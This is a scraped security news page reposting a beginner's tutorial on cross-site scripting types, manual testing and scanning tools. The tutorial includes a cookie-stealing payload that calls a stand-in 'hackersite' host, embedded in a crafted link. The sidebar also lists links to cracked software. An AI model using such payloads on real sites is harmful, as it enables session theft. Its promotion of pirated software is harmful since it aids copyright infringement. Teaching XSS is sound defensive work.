LEFT SIDEBAR AD

Hidden in mobile, Best for skyscrapers.

XSS

3 days ago 11
BOOK THIS SPACE FOR AD
ARTICLE AD

Majd abuleil

Cross-site scripting (XSS) is a type of security vulnerability that allows an attacker to inject malicious scripts into a website, which are then executed by the user’s browser. This can lead to a range of malicious activities, including stealing sensitive information, taking control of the user’s session, or performing unauthorized actions on the user’s behalf.

There are 3 types of Cross-site Scripting (XSS):

1- Reflected XSS => There are two types of reflected XSS the self-reflected XSS or the one where the attacker sends a malicious link to the user, who then executes the XSS on their browser and account.

Example-1: </script>alert(hi)</script> → This code is the basic to check for self XSS on a site.

Example-2: <img src=”x” onerror=fetch(“http://hackersite/aylod?cookie=”+document.cookie); /> →

this one as we see the hacker can send this to a user with the link like:

https://example.com/account/login?d=<img src=”x” onerror=fetch(“http://hackersite/paylod?cookie=”+document.cookie); />

When the user clicks on this link will send the user cookie to the hacker who will use it to login to the user account.

2- DOM-Based XSS => DOM-Based XSS is a type of attack where the attacker manipulates the way a website’s code runs on your browser, without modifying the website itself. This causes the code to behave unexpectedly, allowing the attacker to execute malicious code.

DOM XSS vulnerabilities are primarily attributed to situations where user-controllable sources pass data to sinks, such as:

eval()document.writeinnerHTML

These sinks enable dynamic code execution. To identify potential vulnerabilities, look for user-controllable sources, including:

document.URLdocument.referrerlocationlocation.hreflocation.searchlocation.hash

Knowing where data comes from and goes in your website’s code is key to identifying security weaknesses. By understanding these sources and sinks, you can better identify and mitigate DOM-Based XSS vulnerabilities in your web application

3-Stored XSS => Stored Cross-Site Scripting (XSS) is a type of security vulnerability that occurs when an attacker injects malicious code into a web application’s database, such as in a message forum, visitor log, or comment field. This malicious script is permanently stored on the target server, and when a victim requests the stored information, the script is retrieved and executed by the application. This type of attack is also referred to as Persistent XSS, as the malicious code remains on the server until it is removed or patched.

Example-1: On the website, there is a comment section that attackers well use the comment like this:

1- the attacker will type a malicious code in the comment section and submit this comment.

2- the comment or his malicious code will be saved in the database of the comment section of the website.

3- the user logs in to his account and goes to the blog where this malicious code has been saved and submitted.

4- the malicious code will be executed after the user is inside the blog and in the comment section where the code is saved, allowing the attacker to steal their session cookies or take control of their accounts depending on the code.

Tools & Techniques for Detecting XSS

Manual

I will break this into steps:

1- after choosing a website the first thing to do is take about 10 to 15 minutes to see how the website or the app is working and if there are places where you can test for the XSS vulnerability. [let’s say there is a search bar on the site where you can search for anything and you choose to test this for XSS]

2- you can type anything there like [ TEST ] and there is no result but when you see the source code you will see your word [ TEST ] is in the source code.

If the word you type which the website didn’t find any result, but you find in the source code there is a possibility of 90% that this site is Vurlnabile to XSS

3- you can try to break and type a code that fits the source code and works OR in this step, you can try to use an Automatic tool.

[here also you can use BurpSuite Like Repeater to see how the website acts and responds to your XSS code]

Automatic

There are a lot of tools that scan for XSS and give you the Payload BUT most of the time these tools give a False Positive

Tools ==>

1- XSStrike: https://github.com/s0md3v/XSStrike

XSStrike is a tool designed to detect Cross-Site Scripting (XSS) vulnerabilities. It analyzes a website’s response to different inputs and generates specific payloads that are more likely to exploit the vulnerabilities found, increasing the chances of successful XSS detection0.

2-dalfox: https://github.com/hahwul/dalfox

Dalfox is a tool for finding XSS vulnerabilities. It provides various features such as single URL scanning, massive scanning, REST API server mode, and output customization.
Dalfox can:

Scan a single websiteScan many websites at onceStart a special server for scanningLet you customize the scan results.

Dalfox Modes:
Dalfox has 5 ways to work

url: Scan one websitepipe: Use a special pipeline modefile: Scan a list of websites or raw datasxss: Find a special type of XSS weaknessserver: Start a special server for scanning

CyberViperX

Read Entire Article
  3. XSS

Related

Single endpoint leads to two bounties!(400$)

Single endpoint leads to two bounties!(400$)

Breaking Boundaries: Discovering Session Invalidation Failures in User Roles

Breaking Boundaries: Discovering Session Invalidation Failures in User Roles

Google Warns of Samsung Zero-Day Exploited in the Wild

Google Warns of Samsung Zero-Day Exploited in the Wild

Critical Vulnerabilities Expose mbNET.mini and Helmholz Industrial Routers to Attacks

Critical Vulnerabilities Expose mbNET.mini and Helmholz Industrial Routers to Attacks

Ransomware Alert: Cicada3301 Emerges as Successor to BlackCat

Ransomware Alert: Cicada3301 Emerges as Successor to BlackCat

Security Flaw in Styra’s OPA Exposes NTLM Hashes to Remote Attackers

Security Flaw in Styra’s OPA Exposes NTLM Hashes to Remote Attackers

Trending

1. Arsenal vs Shakhtar Donetsk
2. Share market today
3. North Korean South Korea
4. Indian airlines bomb threats
5. Prithvi Shaw
6. China
7. BRICS
8. Hyundai share price India today
9. Anupam Kher
10. Godavari Biorefineries IPO

Popular

1-click RCE in Electron Applications

1-click RCE in Electron Applications

Install waybackurls on Kali Linux

Install waybackurls on Kali Linux

Microsoft Office Professional Plus 2019 (x64 & x86) Multilingual + Pre-Activated

Microsoft Office Professional Plus 2019 (x64 & x86) Multilingual + Pre-Activated

Over 40 Apps With More Than 100 Million Installs Found Leaking AWS Keys

Over 40 Apps With More Than 100 Million Installs Found Leaking AWS Keys

Install DalFox on Kali Linux

Install DalFox on Kali Linux

Adobe Master Collection CC 2022 v25.08.2022 (x64) Multilingual Pre-Activated

Adobe Master Collection CC 2022 v25.08.2022 (x64) Multilingual Pre-Activated

Maxon CINEMA 4D Studio S22.123 (x64) Multilingual + Crack

Maxon CINEMA 4D Studio S22.123 (x64) Multilingual + Crack

‘We are not motivated by profits’ – Open Bug Bounty maintainers on finding a niche in the crowdsourced AppSec market

‘We are not motivated by profits’ – Open Bug Bounty maintainers on finding a niche in the crowdsourced AppSec market

Just Gopher It: Escalating a Blind SSRF to RCE for $15k

Just Gopher It: Escalating a Blind SSRF to RCE for $15k

SketchUp Pro 2020 v20.2.172 (x64) Multilingual + Patch

SketchUp Pro 2020 v20.2.172 (x64) Multilingual + Patch

BOOK THIS SPACE FOR AD
RIGHT SIDEBAR BOTTOM AD
Bengali (Bangladesh) Bengali (Bangladesh) · English (United States) English (United States) ·
About Us · Terms & Condition · Contact Us
© Security Alert 2024. All rights are reserved